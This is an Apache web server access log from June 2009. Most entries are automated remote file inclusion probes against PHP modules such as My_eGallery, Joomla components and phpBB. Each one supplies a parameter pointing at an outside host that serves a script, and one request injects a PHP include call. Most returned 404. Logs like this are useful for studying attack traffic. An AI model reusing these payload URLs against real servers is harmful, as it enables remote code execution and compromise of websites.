69.64.89.139 - - [21/Jun/2009:02:47:32 -0400] "GET /?dir[plugins]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:02:47:32 -0400] "GET /logs/access_log.Q109060300%20%20/?dir[plugins]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:47:45 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:47:52 -0400] "GET /logs/access_log.Q109052200%20%20/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:48:21 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:02:48:49 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.826"
209.59.12.99 - - [21/Jun/2009:02:49:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [21/Jun/2009:02:49:37 -0400] "GET /logs/error_log.Q109050700//include/lib.inc.php?site_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.826"
74.53.70.114 - - [21/Jun/2009:02:50:26 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.53.70.114 - - [21/Jun/2009:02:50:26 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.53.70.114 - - [21/Jun/2009:02:50:26 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:02:52:13 -0400] "GET /images/over-index14_biomoni.jpg HTTP/1.1" 200 2755 "-" "Googlebot-Image/1.0"
74.53.70.114 - - [21/Jun/2009:02:52:25 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:53:36 -0400] "GET /logs/access_log.Q109061400/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:02:54:20 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:02:54:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [21/Jun/2009:02:54:30 -0400] "GET //include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:54:30 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:54:30 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:54:31 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:54:53 -0400] "GET /logs/access_log.Q109051200//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:02:57:32 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:02:57:32 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:57:47 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:02:58:13 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:02:58:13 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:58:19 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.incl%20ude($_GET[a]),exit.%27&a=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:58:19 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.incl%20ude($_GET[a]),exit.%27&a=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:58:19 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.incl%20ude($_GET[a]),exit.%27&a=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:02:58:20 -0400] "GET /logs/access_log.Q109052400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:02:58:23 -0400] "GET /logs/access_log.Q109060200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:02:58:30 -0400] "GET /modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:02:58:30 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:02:58:30 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:02:58:30 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:02:58:32 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:02:58:32 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:02:58:32 -0400] "GET /modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:02:58:32 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:02:59:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.49.175.157 - - [21/Jun/2009:03:00:11 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:03:00:15 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:03:00:16 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:03:00:19 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:03:00:28 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
65.55.105.231 - - [21/Jun/2009:03:00:35 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.231 - - [21/Jun/2009:03:00:35 -0400] "GET /logs/error_log.Q108080400 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
116.121.201.70 - - [21/Jun/2009:03:00:55 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:03:00:55 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:03:01:03 -0400] "GET /logs/access_log.Q109052400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:03:01:07 -0400] "GET /logs/access_log.Q109060200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
68.109.233.157 - - [21/Jun/2009:03:01:15 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
68.109.233.157 - - [21/Jun/2009:03:01:15 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
68.109.233.157 - - [21/Jun/2009:03:01:18 -0400] "GET /modules/My_eGallery/index.php?basepath=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
68.109.233.157 - - [21/Jun/2009:03:01:19 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
201.232.54.48 - - [21/Jun/2009:03:03:47 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:03:04:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [21/Jun/2009:03:09:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [21/Jun/2009:03:11:07 -0400] "GET /images/over-index5_surgscis.jpg HTTP/1.1" 200 2534 "-" "Googlebot-Image/1.0"
63.147.72.145 - - [21/Jun/2009:03:11:25 -0400] "GET //include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:03:11:25 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:03:11:25 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:03:12:45 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
68.109.233.157 - - [21/Jun/2009:03:13:59 -0400] "GET /logs/error_log.Q109051400%20/modules/My_eGallery/index.php?basepath=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
63.147.72.145 - - [21/Jun/2009:03:14:08 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:03:14:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.82.142 - - [21/Jun/2009:03:14:46 -0400] "GET /logs/access_log.Q109052400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:03:14:48 -0400] "GET /logs/access_log.Q109060200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.15.254.22 - - [21/Jun/2009:03:18:35 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.15.254.22 - - [21/Jun/2009:03:18:35 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.15.254.22 - - [21/Jun/2009:03:18:35 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.15.254.22 - - [21/Jun/2009:03:18:39 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:03:18:46 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:03:18:48 -0400] "GET //index.php?DOCUMENT_ROOT=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:03:18:49 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:03:19:16 -0400] "GET /logs/error_log.Q109060400//index.php?DOCUMENT_ROOT=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:03:19:25 -0400] "GET //index.php?DOCUMENT_ROOT=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:03:19:25 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:03:19:25 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
209.59.12.99 - - [21/Jun/2009:03:19:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [21/Jun/2009:03:20:02 -0400] "GET /logs/error_log.Q109060400//index.php?DOCUMENT_ROOT=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
116.121.201.70 - - [21/Jun/2009:03:20:53 -0400] "GET /logs/access_log.Q109051600%20/errors.php?error=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
200.54.177.242 - - [21/Jun/2009:03:23:31 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 270 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:03:23:31 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 265 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:03:23:31 -0400] "GET /logs/access_log.Q109061200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 292 "-" "Mozilla/5.0"
208.38.188.128 - - [21/Jun/2009:03:23:31 -0400] "GET ///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
200.54.177.242 - - [21/Jun/2009:03:24:05 -0400] "GET /logs/access_log.Q109061300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 292 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:03:24:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.15.254.22 - - [21/Jun/2009:03:25:35 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.15.254.22 - - [21/Jun/2009:03:25:35 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:03:25:59 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 294 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:03:26:08 -0400] "GET /logs/access_log.Q109061300%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 294 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:03:26:56 -0400] "GET /logs/access_log.Q109061100/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:03:26:56 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:03:26:57 -0400] "GET /includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:03:26:57 -0400] "GET /logs/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:03:27:15 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:03:27:15 -0400] "GET /logs/access_log.Q109061800%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:03:27:15 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:03:27:19 -0400] "GET //skin/zero_vote/error.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:03:27:19 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:03:27:19 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:03:27:26 -0400] "GET /logs/access_log.Q109061500%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:03:27:31 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:03:29:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.188.254.4 - - [21/Jun/2009:03:30:01 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:03:30:02 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:03:30:02 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:03:30:02 -0400] "GET /logs/access_log.Q109053000//modules/vwar/admin/admin.php?vwar_root=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:03:30:05 -0400] "GET /images/over-index5_periolev.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
203.188.254.4 - - [21/Jun/2009:03:30:21 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:03:32:48 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.38.188.128 - - [21/Jun/2009:03:33:31 -0400] "GET /logs/access_log.Q109051500///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
208.38.188.128 - - [21/Jun/2009:03:33:31 -0400] "GET ///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
208.38.188.128 - - [21/Jun/2009:03:33:31 -0400] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
209.59.12.99 - - [21/Jun/2009:03:34:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.44.126.182 - - [21/Jun/2009:03:34:38 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:03:34:44 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.38.188.128 - - [21/Jun/2009:03:35:04 -0400] "GET /logs/access_log.Q109051700///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
200.44.126.182 - - [21/Jun/2009:03:35:38 -0400] "GET /logs/access_log.Q109053000%20%20//modules/vwar/admin/admin.php?vwar_root=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:03:38:28 -0400] "GET /logs/access_log.Q109060600/index1.php?site=http://dwno.or.kr/bbs/zipcode/idv6.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.49.99.7 - - [21/Jun/2009:03:38:28 -0400] "GET /index1.php?site=http://dwno.or.kr/bbs/zipcode/idv6.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.49.99.7 - - [21/Jun/2009:03:38:28 -0400] "GET /logs/index1.php?site=http://dwno.or.kr/bbs/zipcode/idv6.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.49.99.7 - - [21/Jun/2009:03:38:35 -0400] "GET /logs/error_log.Q109052300/index1.php?site=http://dwno.or.kr/bbs/zipcode/idv6.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [21/Jun/2009:03:39:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
